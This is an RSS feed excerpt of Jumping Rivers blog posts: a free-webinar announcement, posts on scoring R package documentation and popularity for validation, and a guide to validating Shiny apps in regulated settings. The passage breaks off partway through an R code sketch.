&lt;/p&gt;</description></item><item><title>Elevate Your Skills and Boost Your Career with Jumping Rivers Free Monthly Webinars</title><link>https://www.jumpingrivers.com/blog/jumping-rivers-webinar-launch/</link><pubDate>Tue, 08 Jul 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/jumping-rivers-webinar-launch/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/jumping-rivers-webinar-launch/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/jumping-rivers-webinar-launch/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Are you ready to expand your knowledge in R, Python, Shiny, and Posit while becoming a more valuable asset to your team? Jumping Rivers is here to help you do just that with our free monthly webinar series designed for data professionals at all levels.
These 55-minute sessions are easy to join online and packed with practical insights to help you sharpen your skills, tackle real-world challenges, and stay ahead in the fast-evolving data landscape. Whether you’re looking to improve your coding, learn best practices for deploying apps, or dive into machine learning, there’s something here for you.&lt;/p&gt;
&lt;h2 id="webinar-schedule"&gt;Webinar Schedule&lt;/h2&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th style="text-align: left"&gt;Date &amp;amp; Time (BST)&lt;/th&gt;
&lt;th style="text-align: left"&gt;Topic&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;13:05, 21 August&lt;/td&gt;
&lt;td style="text-align: left"&gt;Reports that Write Themselves: Automated Reporting with Quarto&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;13:05, 18 September&lt;/td&gt;
&lt;td style="text-align: left"&gt;Building Scalable Shiny Apps with Asynchronous Programming&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;13:05, 23 October&lt;/td&gt;
&lt;td style="text-align: left"&gt;Understanding Posit: Ecosystem and Enterprise Use Cases&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;13:05, 20 November&lt;/td&gt;
&lt;td style="text-align: left"&gt;Machine Learning with Python&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="text-align: left"&gt;13:05, 11 December&lt;/td&gt;
&lt;td style="text-align: left"&gt;Accessible Shiny: Designing for All Users&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;&lt;em&gt;Note: All webinars take place on the second last Thursday of each month at 13:05 UK time.&lt;/em&gt;&lt;/p&gt;
&lt;h2 id="meet-our-speakers-and-partners"&gt;Meet Our Speakers and Partners&lt;/h2&gt;
&lt;p&gt;We’re proud to host a diverse range of expert speakers and partners who bring unique perspectives and deep expertise to each session. Keep an eye out for monthly speaker breakdowns by following us on our social media platforms under the name Jumping Rivers - your go-to source for data insights.&lt;/p&gt;
&lt;h2 id="benefits-of-attending"&gt;Benefits of Attending&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Gain hands-on exposure&lt;/strong&gt; to the latest tools and best practices in R, Python, Posit, and Shiny.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Grow your professional network&lt;/strong&gt; by connecting with fellow data scientists, engineers, and experts.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Boost your career prospects&lt;/strong&gt; with practical skills and industry insights that make you stand out.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Flexible, free learning&lt;/strong&gt; — join from anywhere with no cost or commitment.&lt;/li&gt;
&lt;li&gt;Exclusive discounts for attendees:
&lt;ul&gt;
&lt;li&gt;Attend &lt;strong&gt;2 sessions&lt;/strong&gt; and get a &lt;strong&gt;30% discount&lt;/strong&gt; for the upcoming &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;Shiny in Production&lt;/a&gt; in-person conference on the 8th-9th of October 2025 - an event where you can meet and learn from leading experts in the data science and data engineering communities, network with larger companies, and enjoy great food and engaging talks.&lt;/li&gt;
&lt;li&gt;Attend &lt;strong&gt;more than 2 sessions&lt;/strong&gt; and receive a &lt;strong&gt;20% discount&lt;/strong&gt; on any of our public online training courses — known for their high quality and practical focus.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="ready-to-join"&gt;Ready to Join?&lt;/h2&gt;
&lt;p&gt;Register now to secure your spot and start unlocking these benefits:&lt;/p&gt;
&lt;p&gt;&lt;a href="https://jumpingrivers.typeform.com/to/UmdyNbAs" rel="external"&gt;Sign up here!&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;We look forward to welcoming you to our webinars and supporting your data science journey!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/jumping-rivers-webinar-launch/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>R Package Quality: Documentation</title><link>https://www.jumpingrivers.com/blog/r-validation-documentation-litmus/</link><pubDate>Thu, 03 Jul 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-validation-documentation-litmus/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-validation-documentation-litmus/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-validation-documentation-litmus/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is part three of a five part series of related posts on validating R packages.
Other posts in the series are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/litmus-scoring-r-validation/" rel="external"&gt;Validation Guidelines&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/r-validation-author-popularity-litmus/" rel="external"&gt;Package Popularity&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/r-validation-documentation-litmus/" rel="external"&gt;Package Documentation&lt;/a&gt; (this post)&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/r-validation-code-quality-litmus/" rel="external"&gt;Code Quality&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/r-validation-maintainers-litmus/" rel="external"&gt;Maintenance&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In this post, we&amp;rsquo;ll take a closer look at package documentation and how it helps assess the &amp;ldquo;risky-ness&amp;rdquo; of a package.
The documentation score evaluates how complete and helpful a package’s documentation is.
Package documentation comes in many guises.
It could be function examples, vignettes or even a website.
We don’t believe every package &lt;strong&gt;must&lt;/strong&gt; have a website, vignettes, and examples,
but the absence of all three usually points to weak documentation.&lt;/p&gt;
&lt;p&gt;When validating R packages, documentation contributes around 15% to the total.&lt;/p&gt;
&lt;h2 id="score-1-exported-objects-documentation"&gt;Score 1: Exported Objects Documentation&lt;/h2&gt;
&lt;p&gt;A score based on the proportion of exported objects that have documentation.
For example, if we have ten functions, but only eight are documented, then the score would be 0.8.
For all packages on CRAN, this is almost certainly 1, but for packages that are only available on GitHub, this may be less.&lt;/p&gt;
&lt;h2 id="score-2-proportion-of-help-pages-with-examples"&gt;Score 2: Proportion of Help Pages with Examples&lt;/h2&gt;
&lt;p&gt;A score based on the proportion of help pages that have examples.&lt;/p&gt;
&lt;h2 id="score-3-news-file"&gt;Score 3: NEWS file&lt;/h2&gt;
&lt;p&gt;A NEWS file is an indication of a development and release cycle.
It helps users understand what has changed between versions.
This score detects the presence of a NEWS file.
Of course, R packages make this interesting with &lt;code&gt;NEWS&lt;/code&gt;, &lt;code&gt;NEWS.md&lt;/code&gt;, &lt;code&gt;inst/NEWS.md&lt;/code&gt; and/or &lt;code&gt;Changelogs&lt;/code&gt;!&lt;/p&gt;
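&lt;p&gt;A presence check along these lines could look like the Python sketch below. It is only an illustration: the function name &lt;code&gt;news_file_score&lt;/code&gt; is hypothetical, the candidate list is taken from the names above, and the exact changelog file name (&lt;code&gt;ChangeLog&lt;/code&gt; here) is an assumption.&lt;/p&gt;

```python
from pathlib import Path

# File names from the list above; "ChangeLog" is an assumed spelling.
NEWS_CANDIDATES = ("NEWS", "NEWS.md", "inst/NEWS.md", "ChangeLog")


def news_file_score(package_dir) -> float:
    """Return 1.0 if any candidate NEWS file exists in the package source, else 0.0."""
    root = Path(package_dir)
    # Any one of the candidate locations is enough to count as present.
    found = any((root / name).is_file() for name in NEWS_CANDIDATES)
    return 1.0 if found else 0.0
```

&lt;p&gt;Calling &lt;code&gt;news_file_score&lt;/code&gt; on an unpacked package source directory returns 1.0 as soon as one of the candidate files is found.&lt;/p&gt;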
&lt;h2 id="score-4-vignettes"&gt;Score 4: Vignettes&lt;/h2&gt;
&lt;p&gt;Around 40% of CRAN packages have a single vignette, with only 10% having more than one vignette - we checked!
For simplicity, this score is a simple binary metric, based on whether a package has any vignettes.&lt;/p&gt;
&lt;h2 id="score-5-package-website"&gt;Score 5: Package Website&lt;/h2&gt;
&lt;p&gt;Does a package have an associated website? Ten or fifteen years ago, package websites were rare.
Today, GitHub and GitLab make it easy for a package to host a website.&lt;/p&gt;
&lt;h2 id="score-6-news-updated-to-the-current-version"&gt;Score 6: NEWS updated to the Current version&lt;/h2&gt;
&lt;p&gt;This score checks whether the package’s NEWS file covers the current version. An outdated or missing NEWS file makes it challenging to track recent changes, bug fixes, or updates.
This lack of transparency may pose risks, as users are unable to verify whether critical updates have been implemented.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Need help with R package validation to unleash the power of open source? Check out the &lt;a href="https://www.jumpingrivers.com/litmus/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2025-litmus-scoring-documentation"&gt; Litmusverse suite of risk assessment tools&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="summary"&gt;Summary&lt;/h2&gt;
&lt;p&gt;We can all agree that a package doesn’t need all of the components described above.
It’s perfectly reasonable to have few examples, but very detailed vignettes.
The important point is to investigate packages that have little documentation.&lt;/p&gt;
&lt;h2 id="examples"&gt;Examples&lt;/h2&gt;
&lt;p&gt;Using the packages from the previous blog post, and omitting scores where all packages scored 1, we have the following results:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Package&lt;/th&gt;
&lt;th&gt;News Current&lt;/th&gt;
&lt;th&gt;Vignettes&lt;/th&gt;
&lt;th&gt;Examples&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;drat&lt;/td&gt;
&lt;td&gt;1.00&lt;/td&gt;
&lt;td&gt;1.00&lt;/td&gt;
&lt;td&gt;0.43&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;microbenchmark&lt;/td&gt;
&lt;td&gt;0.00&lt;/td&gt;
&lt;td&gt;0.00&lt;/td&gt;
&lt;td&gt;0.20&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;shinyjs&lt;/td&gt;
&lt;td&gt;1.00&lt;/td&gt;
&lt;td&gt;1.00&lt;/td&gt;
&lt;td&gt;0.90&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;tibble&lt;/td&gt;
&lt;td&gt;1.00&lt;/td&gt;
&lt;td&gt;1.00&lt;/td&gt;
&lt;td&gt;0.61&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;tsibble&lt;/td&gt;
&lt;td&gt;0.00&lt;/td&gt;
&lt;td&gt;1.00&lt;/td&gt;
&lt;td&gt;0.82&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;All packages use source control, have a package website and provide documentation.
The &lt;code&gt;{microbenchmark}&lt;/code&gt; package doesn&amp;rsquo;t have a NEWS file or changelog, and it&amp;rsquo;s also missing vignettes.
But recall it still has a high overall package score.
The idea behind litmus isn&amp;rsquo;t that a package must be perfect, but to take a pragmatic approach to scoring.&lt;/p&gt;
&lt;p&gt;Oddly, the &lt;code&gt;{tsibble}&lt;/code&gt; package does have a NEWS file, but it doesn&amp;rsquo;t mention the &lt;a href="https://github.com/tidyverts/tsibble/issues/320" rel="external"&gt;latest version&lt;/a&gt;. I think this was an oversight.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-validation-documentation-litmus/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Building Trust with Code: Validating Shiny Apps in Regulated Environments</title><link>https://www.jumpingrivers.com/blog/validating-shiny-apps-in-regulated-environments/</link><pubDate>Mon, 30 Jun 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/validating-shiny-apps-in-regulated-environments/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/validating-shiny-apps-in-regulated-environments/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/validating-shiny-apps-in-regulated-environments/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;This blog post is a follow up to my &lt;a href="https://www.youtube.com/watch?v=ebIk2fxFUfI" rel="external"&gt;2025 R/Medicine talk&lt;/a&gt; on Validating Shiny Apps in Regulated Environments.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Over the last few years, Shiny has become a cornerstone in data science applications, from dashboards and review tools to interactive decision-making apps. But in regulated environments like pharma, healthcare, or finance, the stakes are higher. A clever visualization isn’t enough. We need to prove the app works reliably, reproducibly, and transparently.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;So, what does it actually mean to validate a Shiny app?&lt;/strong&gt;&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Want to ensure that your application or dashboard follows the latest standards? You might benefit from our &lt;a href="https://www.jumpingrivers.com/data-science/visualisation-and-dashboards/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2025-validating-shiny-apps-regulated-environments"&gt;Shiny health check&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="why-validation-matters"&gt;Why Validation Matters&lt;/h3&gt;
&lt;p&gt;Validation isn&amp;rsquo;t about ticking a box. It’s about building trust.&lt;/p&gt;
&lt;p&gt;In regulated settings, apps influence real world decisions. Regulators expect traceability, reproducibility, and documentation. Without these, you&amp;rsquo;re not just at risk of bugs, you risk noncompliance. And that means delays, rework, or worse.&lt;/p&gt;
&lt;p&gt;Think of validation as a safety net. It ensures the app behaves as expected, be it under edge cases, months down the line, or even when someone else deploys it.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;We once helped a client whose Shiny app was blocked from deployment by their compliance team because there was no documentation of who had last changed a calculation. Adding logging and a simple GitHub workflow solved it overnight.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;Validation doesn’t have to be complex. It just has to be intentional.&lt;/strong&gt;&lt;/p&gt;
&lt;h3 id="what-makes-a-shiny-app-validatable"&gt;What Makes a Shiny App Validatable?&lt;/h3&gt;
&lt;p&gt;Not every Shiny app is born equal. But some design choices from the start can make validation easier down the line:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Modular, testable code: Keep logic in functions, not tangled in &lt;code&gt;server.R&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Clear separation: UI, logic, and data should live in separate spaces.&lt;/li&gt;
&lt;li&gt;Version control: For both code and data.&lt;/li&gt;
&lt;li&gt;Reproducible environments: Ensure the development environment can be replicated.&lt;/li&gt;
&lt;li&gt;Minimal hidden state: Avoid global variables or side effects.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;These practices aren’t just about validation, they also make your codebase more maintainable and collaborative.&lt;/strong&gt;&lt;/p&gt;
&lt;h3 id="common-pitfalls-and-how-to-avoid-them"&gt;Common Pitfalls (and How to Avoid Them)&lt;/h3&gt;
&lt;p&gt;As someone who has seen a lot of Shiny applications over the years, I see the same patterns come up again and again, especially when validating legacy apps.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Hardcoded file paths that break in production&lt;/li&gt;
&lt;li&gt;Ad hoc data wrangling inside server functions&lt;/li&gt;
&lt;li&gt;Global variables causing unpredictable behavior&lt;/li&gt;
&lt;li&gt;No formal record of package dependencies&lt;/li&gt;
&lt;li&gt;No tests. No logs. No idea who changed what or why&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Sound familiar? You’re not alone. These are solvable problems, often with small changes that pay off in the long run.&lt;/strong&gt;&lt;/p&gt;
&lt;h3 id="the-unique-challenge-of-shiny"&gt;The Unique Challenge of Shiny&lt;/h3&gt;
&lt;p&gt;Shiny is interactive by nature, which makes it harder to validate than static scripts. Here’s what makes it tricky and what to do about it:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Reactive chains hide logic. Break them down and add logging.&lt;/li&gt;
&lt;li&gt;User controlled outputs might produce unexpected results. Validate downloadable content and limit inputs.&lt;/li&gt;
&lt;li&gt;Deployment differences matter. Validate the version that’s actually in production.&lt;/li&gt;
&lt;li&gt;No audit trail by default. Packages like &lt;code&gt;{logger}&lt;/code&gt;, &lt;code&gt;{loggit}&lt;/code&gt;, or custom logging can give you a starting point.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;In Shiny apps, testing isn&amp;rsquo;t just about code, it&amp;rsquo;s about behavior. Think about what the user sees, clicks, and downloads. All of that needs to be validated.&lt;/strong&gt;&lt;/p&gt;
&lt;h3 id="software-engineering-for-validation"&gt;Software Engineering for Validation&lt;/h3&gt;
&lt;p&gt;Good engineering habits go a long way:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Use &lt;code&gt;{testthat}&lt;/code&gt; for logic&lt;/li&gt;
&lt;li&gt;Combine with &lt;code&gt;{shinytest2}&lt;/code&gt; for UI workflows&lt;/li&gt;
&lt;li&gt;Use &lt;code&gt;{lintr}&lt;/code&gt; and CI/CD pipelines to catch issues early&lt;/li&gt;
&lt;li&gt;Set up a code review process&lt;/li&gt;
&lt;li&gt;Automate documentation and testing reports&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;With that in mind, an example of a minimal validation stack could look something like:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;{testthat}&lt;/code&gt; for unit testing&lt;/li&gt;
&lt;li&gt;&lt;code&gt;{shinytest2}&lt;/code&gt; for end to end checks&lt;/li&gt;
&lt;li&gt;&lt;code&gt;{renv}&lt;/code&gt; or Docker for environments&lt;/li&gt;
&lt;li&gt;&lt;code&gt;{logger}&lt;/code&gt; for audit trails&lt;/li&gt;
&lt;li&gt;GitHub Actions (or similar) for automation&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;All of this is easier to implement when you build it in from the start.&lt;/p&gt;
&lt;h3 id="documentation-the-backbone-of-validation"&gt;Documentation: The Backbone of Validation&lt;/h3&gt;
&lt;p&gt;Documentation doesn’t have to be bureaucratic. It just has to be clear.&lt;/p&gt;
&lt;p&gt;A great way to get started would be:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Functional Requirements Spec (FRS): What the app should do&lt;/li&gt;
&lt;li&gt;Test Plan &amp;amp; Summary (TP/TSR): How you know it does it&lt;/li&gt;
&lt;li&gt;README/User Guide: For both users and reviewers&lt;/li&gt;
&lt;li&gt;Audit trail: Who changed what, when, and why&lt;/li&gt;
&lt;li&gt;Reproducibility artifacts: renv.lock, Dockerfiles, Git commits&lt;/li&gt;
&lt;/ul&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Need help with R package validation to unleash the power of open source? Check out the &lt;a href="https://www.jumpingrivers.com/litmus/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2025-validating-shiny-apps-regulated-environments"&gt; Litmusverse suite of risk assessment tools&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="matching-effort-to-risk"&gt;Matching Effort to Risk&lt;/h3&gt;
&lt;p&gt;Not every app needs the same level of scrutiny. That’s where a risk-based approach, guided by your organisation’s risk appetite, comes in.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Low risk: sandbox tools, exploratory dashboards → lighter touch&lt;/li&gt;
&lt;li&gt;High risk: decision support, outputs used in reports or submissions → full validation&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Start by defining the app’s intended use, data sensitivity, and audience. Doing so helps you make smart trade-offs.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;“But it’s just an internal tool!”&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Internal tools often evolve into production tools. Validation future-proofs them.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;“It slows us down!”&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;Done right, validation saves time. It catches bugs early and reduces friction with compliance teams.&lt;/strong&gt;&lt;/p&gt;
&lt;h3 id="tools-for-risk--security"&gt;Tools for Risk &amp;amp; Security&lt;/h3&gt;
&lt;p&gt;Beyond testing and documentation, assessing package-level risk and security is essential, especially when your app depends on external libraries.&lt;/p&gt;
&lt;p&gt;There are some tools out there that can help with this, including:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://pharmar.github.io/riskmetric/" rel="external"&gt;riskmetric&lt;/a&gt;: Evaluate risk across R packages using metrics like maintenance, documentation, and testing.&lt;/li&gt;
&lt;li&gt;&lt;a href="https://sonatype-nexus-community.github.io/oysteR/" rel="external"&gt;oysteR&lt;/a&gt;: Scan R packages for known security vulnerabilities via CVEs.&lt;/li&gt;
&lt;li&gt;&lt;a href="https://diffify.com/" rel="external"&gt;diffify&lt;/a&gt; – Compare changes between versions of R packages to identify what’s changed and what might break.&lt;/li&gt;
&lt;li&gt;&lt;a href="https://litmus-dashboard.jmpr.io/" rel="external"&gt;Litmus.dashboard&lt;/a&gt; – Explore package-level risk scores interactively and track changes over time.&lt;/li&gt;
&lt;/ul&gt;
&lt;img src="overview.png" alt="Litmus dashboard showing distribution of overall package scores" style="width: 400px; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;h3 id="how-we-deal-with-shiny-validation-in-jumping-rivers"&gt;How we deal with Shiny Validation in Jumping Rivers&lt;/h3&gt;
&lt;p&gt;At Jumping Rivers, we&amp;rsquo;ve been validating R packages for quite some time now, and have in the meanwhile developed the &lt;a href="https://www.jumpingrivers.com/litmus/" rel="external"&gt;Litmusverse&lt;/a&gt;, a toolkit designed to make R package validation easier, more transparent, and aligned with regulatory expectations.&lt;/p&gt;
&lt;p&gt;But how is that related to Shiny Validation? While a Shiny app doesn’t &lt;strong&gt;have&lt;/strong&gt; to be a package, treating it as one simplifies validation &lt;strong&gt;a lot&lt;/strong&gt;. It lets us apply the same best practices used for standard R packages: version control, documentation, testing, and reproducible environments. From there, we just add application specific validation steps.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Validate the Shiny application’s package dependencies with the Litmusverse workflow, using a scoring strategy that suits the application’s risk appetite.&lt;/li&gt;
&lt;li&gt;Validate the application code itself using a separate scoring strategy that focuses on code quality and documentation rather than on the popularity or CRAN metrics we would use for dependencies. (Litmus allows scoring strategies to be tweaked at will, and custom metrics to be included if needed.)&lt;/li&gt;
&lt;li&gt;Generate a report with the results from both the dependency validation and the application validation.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;br/&gt;&lt;br/&gt;&lt;/p&gt;
&lt;img src="litmus-workflow.png" alt="Litmus validation workflow" style="width: 400px; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;&lt;br/&gt;&lt;br/&gt;&lt;/p&gt;
&lt;h3 id="final-thoughts-start-validated-stay-validated"&gt;Final Thoughts: Start Validated, Stay Validated&lt;/h3&gt;
&lt;p&gt;The best time to think about validation is at the start of your project. The second best time is right now.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Build with validation in mind.&lt;/li&gt;
&lt;li&gt;Document as you go.&lt;/li&gt;
&lt;li&gt;Automate wherever possible.&lt;/li&gt;
&lt;li&gt;Choose tools that support transparency and traceability.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Validation isn’t a one-time hurdle. It’s a habit you build with each commit, each test, each documented decision.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Validation isn’t a blocker, it’s a confidence booster. For you, your team, and your reviewers.&lt;/strong&gt;&lt;/p&gt;
&lt;h2 id="get-in-touch"&gt;Get in Touch&lt;/h2&gt;
&lt;p&gt;If you&amp;rsquo;re interested in learning more about R validation and how it can be used to unleash the power of open source in your organisation, &lt;a href="https://www.jumpingrivers.com/contact/?subject=Litmus" rel="external"&gt;contact us&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/validating-shiny-apps-in-regulated-environments/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>R Package Quality: Package Popularity</title><link>https://www.jumpingrivers.com/blog/r-validation-author-popularity-litmus/</link><pubDate>Thu, 26 Jun 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-validation-author-popularity-litmus/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-validation-author-popularity-litmus/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-validation-author-popularity-litmus/downloads.svg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is part two of a five part series of related posts on validating R packages.
Other posts in the series are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/litmus-scoring-r-validation/" rel="external"&gt;Validation Guidelines&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/r-validation-author-popularity-litmus/" rel="external"&gt;Package Popularity&lt;/a&gt; (this post)&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/r-validation-documentation-litmus/" rel="external"&gt;Package Documentation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/r-validation-code-quality-litmus/" rel="external"&gt;Code Quality&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/r-validation-maintainers-litmus/" rel="external"&gt;Maintenance&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In our &lt;a href="https://www.jumpingrivers.com/blog/litmus-scoring-r-validation/" rel="external"&gt;previous post&lt;/a&gt;,
we introduced the four components that make up a litmus package score: documentation, popularity, code quality, and maintenance.
In this post, we&amp;rsquo;ll look at package popularity.
Package popularity is an interesting, and sometimes controversial, measure.
In our experience it often sparks strong (and usually negative) reactions.
The idea is simple: if a package is widely used, bugs are more likely to be found and fixed, and if the maintainer steps away, there’s a higher chance someone else will take over.
Of course, high usage doesn’t mean a package is risk-free.
But popularity can provide helpful context.
Consider this example:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;{pkgA}&lt;/code&gt;: Extremely popular and a dependency for many other packages.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;{pkgB}&lt;/code&gt;: Very few downloads and minimal usage.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In a situation like this, &lt;code&gt;{pkgA}&lt;/code&gt; may offer more stability over time, simply because more people rely on it.
It does &lt;strong&gt;not&lt;/strong&gt; mean that &lt;code&gt;{pkgA}&lt;/code&gt; is risk-free, only that the risk is lower than for &lt;code&gt;{pkgB}&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;All other things being equal, if you had sixty minutes to assess both packages, would you spend thirty minutes on each, or weight your time towards the less popular package?&lt;/p&gt;
&lt;p&gt;It’s important to keep in mind that &lt;strong&gt;statistical packages tend to be less popular than &amp;ldquo;foundational&amp;rdquo; ones&lt;/strong&gt;.
Packages for tasks like data wrangling, date-times, and plotting are used by nearly everyone, regardless of the use case.
In contrast, more specialised packages, for example, those designed to handle experimental designs with drop-outs, naturally have a smaller audience.&lt;/p&gt;
&lt;p&gt;So a lower popularity doesn’t necessarily reflect lower quality or usefulness. It may just reflect a more niche purpose.&lt;/p&gt;
&lt;h3 id="score-1-yearly-downloads"&gt;Score 1: Yearly Downloads&lt;/h3&gt;
&lt;p&gt;For packages on CRAN, we can obtain download statistics.
Of course, the obvious question is, &amp;ldquo;what is a large number of downloads?&amp;rdquo;
To answer this question, we obtained the download statistics of every package on CRAN, and used that data
as the basis of our score.&lt;/p&gt;
&lt;p&gt;More precisely, if a package is in the upper quartile for the number of package downloads (approximately 7,000 downloads per year),
the package is scored 1. Otherwise, the empirical CDF is used to score.&lt;/p&gt;
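&lt;p&gt;To make the rule concrete, here is a minimal sketch of one literal reading of it. It is not the litmus implementation: &lt;code&gt;score_downloads()&lt;/code&gt; is a hypothetical helper, the download counts are simulated rather than taken from CRAN, and the real score may rescale the empirical CDF differently.&lt;/p&gt;
&lt;pre&gt;&lt;code class="language-r"&gt;# Simulated yearly download counts standing in for "every package on CRAN"
# (hypothetical data; the real score is based on actual CRAN statistics)
set.seed(1)
cran_downloads = round(rlnorm(20000, meanlog = 8, sdlog = 1.5))

# Hypothetical helper: packages in the upper quartile score 1,
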